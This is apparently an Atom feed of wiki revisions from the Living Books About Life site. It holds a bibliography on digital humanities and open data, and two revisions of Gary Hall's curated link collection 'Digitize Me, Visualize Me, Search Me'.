Cohen, D. (2010), ‘Searching for the Victorians’, ''Dan Cohen'', October 4. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Cohen, P. (2010), ‘Digital Keys for Unlocking the Humanities’ Riches’, ''The New York Times'', November 16. http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;amp;hp=&amp;amp;amp;pagewanted=all. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Croxall, B. 
(2010), response to Tanner Higgin, ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System'', September 10. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze, G. and Guattari, F. (1988), ''A Thousand Plateaus: Capitalism and Schizophrenia''. London: Athlone. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Deleuze, G. and Guattari, F. (1994), ''What is Philosophy?''. New York: Columbia University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fung, A., Graham, M. and Weil, D. (2007), ''Full Disclosure: The Perils and Promise of Transparency''. Cambridge: Cambridge University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Frabetti, F. (2010), ‘Digital Again? The Humanities Between the Computational Turn and Originary Technicity’, talk given to the Open Media Group, Coventry School of Art and Design, November 9. http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Franklin, K. D. and Rodriguez’G, K. (2008), ‘The Next Big Thing in Humanities, Arts and Social Science Computing: Cultural Analytics’, ''HPC Wire'', July 29. http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gibbs, R. (2010), Presidential press secretary, cited in ‘White House Condemns WikiLeaks’ Release’, ''MSNBC.com News'', November 28. http://www.msnbc.msn.com/id/40405589/ns/us_news-security. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010a), ‘Open Data: Empowering the Empowered or Effective Data Use for Everyone?’, ''Gurstein’s Community Informatics'', September 2. http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2010b), ‘Open Data (2): Effective Data Use’, ''Gurstein’s Community Informatics'', September 9. http://gurstein.wordpress.com/2010/09/09/open-data-2-effective-data-use/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Gurstein, M. (2011), ‘Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide’, posting to the nettime mailing list, July 5. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hall, G. (2010), ‘We Can Know It For You: The Secret Life of Metadata’, ''How We Became Metadata''. London: Institute for Modern and Contemporary Culture, University of Westminster. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Higgin, T. (2010), ‘Cultural Politics, Critique, and the Digital Humanities’, ''Gaming the System'', May 25. http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hindman, M. (2009), ''The Myth of Digital Democracy''. Princeton, NJ and Oxford: Princeton University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Hoffman, M. (2010), ‘EFF Posts Documents Detailing Law Enforcement Collection of Data From Social Media Sites’, ''Electronic Frontier Foundation'', March 16. http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Houghton, J. (2009), ‘Open Access - What are the Economic Benefits?: A Comparison of the United Kingdom, Netherlands and Denmark’, Centre for Strategic Economic Studies, Victoria University, Melbourne. 
http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Jarvis, J. (2010), ‘Time For Citizens of the Internet to Stand Up’, ''The Guardian: MediaGuardian'', March 29. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; JISC (2009), ‘Press Release: Open Science - the Future for Research?’, posting to the BOAI list, November 16. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Kerssens, N. and Dekker, A. (2009), ‘Interview with Lev Manovich for Archive 2020’, ''Virtueel_ Platform''. http://www.virtueelplatform.nl/#2595. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Knouf, N. (2010), ‘The JJPS Extension: Presenting Academic Performance Information’, ''Journal of Journal Performance Studies'', Vol. 1, No. 1. Available at http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6. Accessed 20 June, 2010. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Latour, B. (2004), ‘Why Has Critique Run Out of Steam? From Matters of Fact to Matters of Concern’, ''Critical Inquiry'', Vol. 30, No. 2. http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Liu, A. (2011), ‘Where is Cultural Criticism in the Digital Humanities’, paper presented at the panel on ‘The History and Future of the Digital Humanities’, Modern Language Association convention, Los Angeles, January 7. http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1986), ''The Postmodern Condition: A Report on Knowledge''. Manchester: Manchester University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Lyotard, J.-F. (1991), ''The Inhuman: Reflections on Time''. Cambridge: Polity. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2010a), ‘Cultural Analytics Lectures by Manovich in UK (London and Swansea), March 8-9, 2010’, ''Software Studies Initiative'', March 8. http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, L. (2011), ‘Trending: The Promises and the Challenges of Big Social Data’, ''Lev Manovich'', April 28. http://www.manovich.net/DOCS/Manovich_trending_paper.pdf. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meeks, E. (2010), ‘The Digital Humanities as Imagined Community’, ''Digital Humanities Specialist'', September 14. https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mintel (2010), ‘Energy Efficiency in the Home - UK - July 2010’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Murray, S., Choi, S., Hoey, J., Kendall, C., Maskalyk, J. and Palepu, A. (2008), ‘Open Science, Open Access and Open Source Software at ''Open Medicine''’, ''Open Medicine'', 2(1): e1–e3. http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/?tool=pmcentrez http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Patterson, M. (2009), ‘Article-Level Metrics at PLoS – Addition of Usage Data’, ''PLoS: Public Library of Science'', September 16. http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Pubget (2010), ‘[BOAI] PLoS Launches Fast (Open) PDF Access with Pubget’, posted on the BOAI list by Peter Suber, March 8. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Poynder, R. 
(2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a), ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', May 12. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b), response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen'', October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Cambridge, MA: MIT Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’, ''The New York Times'', January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford, February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’, ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Cambridge, MA: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009), ‘Global Warming: Brits Deny Humans are to Blame’, ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’, January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. (eds) (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5500</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5500"/>
		<updated>2013-11-02T11:23:03Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4] &lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are increasingly being used to produce new ways of approaching and understanding texts in the humanities – what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generational Divide in Cognitive Modes]&lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neurological Turn In/Against Networked Media]&lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda &lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
;[https://brandyourself.com/ BrandYourself]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alessio Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavrs]&lt;br /&gt;
&lt;br /&gt;
;[http://bengrosser.com/projects/facebook-demetricator/ Facebook Demetricator]&lt;br /&gt;
&lt;br /&gt;
;[http://prisom.me/ #PRISOM]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, ''The Open Society and its Enemies''&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5221</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5221"/>
		<updated>2012-10-19T10:12:36Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4] &lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
